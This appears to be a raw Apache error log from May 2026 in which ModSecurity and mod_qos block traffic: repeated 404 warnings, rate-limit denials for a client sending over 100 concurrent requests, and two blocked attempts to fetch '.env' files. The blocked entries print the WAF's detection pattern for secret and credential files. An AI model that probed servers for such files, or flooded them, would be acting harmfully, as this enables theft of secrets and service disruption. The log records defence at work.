[Tue May 26 19:54:22.291764 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFGDRMqfxdEDkoszPYQAAAFU"]
[Tue May 26 19:54:22.293987 2026] [security2:error] [pid 93868:tid 94379] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25H6wAAAgg"]
[Tue May 26 19:54:22.297302 2026] [security2:error] [pid 93868:tid 94325] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25H6gAAAdI"]
[Tue May 26 19:54:22.304754 2026] [security2:error] [pid 93868:tid 94339] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25H6QAAAeA"]
[Tue May 26 19:54:22.310044 2026] [security2:error] [pid 93576:tid 93766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFGDRMqfxdEDkoszPbAAAADY"]
[Tue May 26 19:54:22.310098 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFWDRMqfxdEDkoszPeAAAAEU"]
[Tue May 26 19:54:22.310822 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFGDRMqfxdEDkoszPagAAAA8"]
[Tue May 26 19:54:22.322126 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFWDRMqfxdEDkoszPdQAAACo"]
[Tue May 26 19:54:22.324758 2026] [security2:error] [pid 93868:tid 94265] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFEqK9k_ZUB2Vp25H5AAAAZY"]
[Tue May 26 19:54:22.329280 2026] [security2:error] [pid 93868:tid 94285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25H8QAAAao"]
[Tue May 26 19:54:22.329721 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFWDRMqfxdEDkoszPeQAAAHk"]
[Tue May 26 19:54:22.333396 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFWDRMqfxdEDkoszPfwAAAAs"]
[Tue May 26 19:54:22.353844 2026] [security2:error] [pid 93868:tid 94346] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25H9QAAAec"]
[Tue May 26 19:54:22.354583 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFWDRMqfxdEDkoszPggAAAA0"]
[Tue May 26 19:54:22.363904 2026] [security2:error] [pid 93868:tid 94295] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25IBwAAAbQ"]
[Tue May 26 19:54:22.372967 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFWDRMqfxdEDkoszPlAAAAHY"]
[Tue May 26 19:54:22.375270 2026] [security2:error] [pid 93868:tid 94334] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25H9AAAAds"]
[Tue May 26 19:54:22.383947 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFWDRMqfxdEDkoszPdgAAAAU"]
[Tue May 26 19:54:22.406342 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFWDRMqfxdEDkoszPlQAAAFg"]
[Tue May 26 19:54:22.406959 2026] [security2:error] [pid 93576:tid 93761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFWDRMqfxdEDkoszPlgAAADE"]
[Tue May 26 19:54:22.407480 2026] [security2:error] [pid 93576:tid 93790] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFWDRMqfxdEDkoszPmQAAAE4"]
[Tue May 26 19:54:22.413363 2026] [security2:error] [pid 93868:tid 94290] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25H-QAAAa8"]
[Tue May 26 19:54:22.416037 2026] [security2:error] [pid 93868:tid 94354] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25H8AAAAe8"]
[Tue May 26 19:54:22.422346 2026] [security2:error] [pid 93868:tid 94313] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25ICAAAAcY"]
[Tue May 26 19:54:22.428180 2026] [security2:error] [pid 93576:tid 93824] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFWDRMqfxdEDkoszPlwAAAHA"]
[Tue May 26 19:54:22.441852 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFWDRMqfxdEDkoszPmwAAAB0"]
[Tue May 26 19:54:22.448683 2026] [security2:error] [pid 93868:tid 94273] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25IFAAAAZ4"]
[Tue May 26 19:54:22.449690 2026] [security2:error] [pid 93868:tid 94371] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25H-wAAAgA"]
[Tue May 26 19:54:22.449857 2026] [security2:error] [pid 93576:tid 93744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFWDRMqfxdEDkoszPmAAAACA"]
[Tue May 26 19:54:22.452355 2026] [security2:error] [pid 86490:tid 86643] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFVZMwN0DpLVWo6K7fgAAAJw"]
[Tue May 26 19:54:22.511674 2026] [security2:error] [pid 86490:tid 86734] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/@fs/.env"] [unique_id "ahWtFlZMwN0DpLVWo6K7-gAAAPc"]
[Tue May 26 19:54:22.567564 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8CAAAAME
[Tue May 26 19:54:22.568456 2026] [qos:error] [pid 93868:tid 94358] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtFkqK9k_ZUB2Vp25IKgAAAfM
[Tue May 26 19:54:22.570535 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtFmDRMqfxdEDkoszPzgAAABM
[Tue May 26 19:54:22.580880 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFmDRMqfxdEDkoszPzwAAAC0
[Tue May 26 19:54:22.581388 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8CgAAAKg
[Tue May 26 19:54:22.592239 2026] [qos:error] [pid 86490:tid 86642] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8CwAAAJs
[Tue May 26 19:54:22.602806 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8DAAAANQ
[Tue May 26 19:54:22.602888 2026] [qos:error] [pid 86490:tid 86697] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8DQAAANI
[Tue May 26 19:54:22.604480 2026] [qos:error] [pid 93576:tid 93778] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFmDRMqfxdEDkoszP0AAAAEI
[Tue May 26 19:54:22.609031 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8DgAAAJw
[Tue May 26 19:54:22.717818 2026] [qos:error] [pid 86490:tid 86644] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8EgAAAJ0
[Tue May 26 19:54:22.721362 2026] [qos:error] [pid 86490:tid 86734] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8EwAAAPc
[Tue May 26 19:54:22.728813 2026] [qos:error] [pid 86490:tid 86658] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8FAAAAKs
[Tue May 26 19:54:22.733093 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFmDRMqfxdEDkoszP0gAAABo
[Tue May 26 19:54:22.735205 2026] [qos:error] [pid 86490:tid 86728] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8FQAAAPE
[Tue May 26 19:54:22.741038 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8FgAAAMo
[Tue May 26 19:54:22.752892 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8FwAAAM4
[Tue May 26 19:54:22.754513 2026] [qos:error] [pid 86490:tid 86702] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8GAAAANc
[Tue May 26 19:54:22.758259 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFmDRMqfxdEDkoszP0wAAAH4
[Tue May 26 19:54:22.762597 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8GwAAAIc
[Tue May 26 19:54:22.868567 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8HgAAAKg
[Tue May 26 19:54:22.871956 2026] [qos:error] [pid 86490:tid 86642] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8HwAAAJs
[Tue May 26 19:54:22.880560 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8IAAAANQ
[Tue May 26 19:54:22.885506 2026] [qos:error] [pid 93576:tid 93794] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFmDRMqfxdEDkoszP1gAAAFI
[Tue May 26 19:54:22.887760 2026] [qos:error] [pid 86490:tid 86697] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8IQAAANI
[Tue May 26 19:54:22.889569 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8IgAAAJw
[Tue May 26 19:54:22.904685 2026] [qos:error] [pid 86490:tid 86732] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8IwAAAPU
[Tue May 26 19:54:22.907023 2026] [qos:error] [pid 86490:tid 86644] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8JAAAAJ0
[Tue May 26 19:54:22.910771 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFmDRMqfxdEDkoszP1wAAADI
[Tue May 26 19:54:22.914299 2026] [qos:error] [pid 86490:tid 86734] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K8JgAAAPc
[Tue May 26 19:54:23.021555 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8KAAAAOw
[Tue May 26 19:54:23.021909 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8KQAAAP8
[Tue May 26 19:54:23.034064 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8KgAAAM4
[Tue May 26 19:54:23.038201 2026] [qos:error] [pid 86490:tid 86702] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8KwAAANc
[Tue May 26 19:54:23.039433 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8LAAAAIc
[Tue May 26 19:54:23.045075 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF2DRMqfxdEDkoszP2QAAAAc
[Tue May 26 19:54:23.054144 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8LQAAAJc
[Tue May 26 19:54:23.059156 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8LgAAAKg
[Tue May 26 19:54:23.064604 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8LwAAANQ
[Tue May 26 19:54:23.068450 2026] [qos:error] [pid 93576:tid 93742] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF2DRMqfxdEDkoszP2gAAAB4
[Tue May 26 19:54:23.156300 2026] [security2:error] [pid 86490:tid 86647] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/production/.env"] [unique_id "ahWtF1ZMwN0DpLVWo6K8MgAAAKA"]
[Tue May 26 19:54:23.171371 2026] [qos:error] [pid 86490:tid 86728] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8MwAAAPE
[Tue May 26 19:54:23.175770 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8NAAAAK0
[Tue May 26 19:54:23.188433 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8NQAAAMo
[Tue May 26 19:54:23.189604 2026] [qos:error] [pid 86490:tid 86637] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8NgAAAJY
[Tue May 26 19:54:23.191309 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8NwAAAJE
[Tue May 26 19:54:23.198014 2026] [qos:error] [pid 93576:tid 93834] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF2DRMqfxdEDkoszP2wAAAHo
[Tue May 26 19:54:23.203969 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8OAAAAOw
[Tue May 26 19:54:23.214769 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8OQAAAP8
[Tue May 26 19:54:23.215670 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF1ZMwN0DpLVWo6K8OgAAAM4
[Tue May 26 19:54:23.220385 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtF2DRMqfxdEDkoszP3AAAACk
[Tue May 26 19:54:23.277469 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFWDRMqfxdEDkoszPkwAAAGc"]
[Tue May 26 19:54:23.277642 2026] [security2:error] [pid 93868:tid 94350] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25IEAAAAes"]
[Tue May 26 19:54:23.289706 2026] [security2:error] [pid 86490:tid 86691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFVZMwN0DpLVWo6K7eQAAAMw"]
[Tue May 26 19:54:23.289786 2026] [security2:error] [pid 86490:tid 86634] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFVZMwN0DpLVWo6K7fwAAAJM"]
[Tue May 26 19:54:23.294664 2026] [security2:error] [pid 93868:tid 94366] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25IDAAAAfs"]
[Tue May 26 19:54:23.300207 2026] [security2:error] [pid 93868:tid 94361] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25IDwAAAfY"]
